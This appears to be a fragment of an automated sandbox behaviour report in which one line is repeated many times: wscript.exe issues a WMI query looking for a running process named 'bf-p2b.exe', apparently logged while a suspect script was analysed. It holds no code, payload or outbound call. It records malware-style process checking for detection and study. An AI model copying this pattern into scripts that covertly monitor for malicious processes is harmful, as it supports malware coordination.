                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
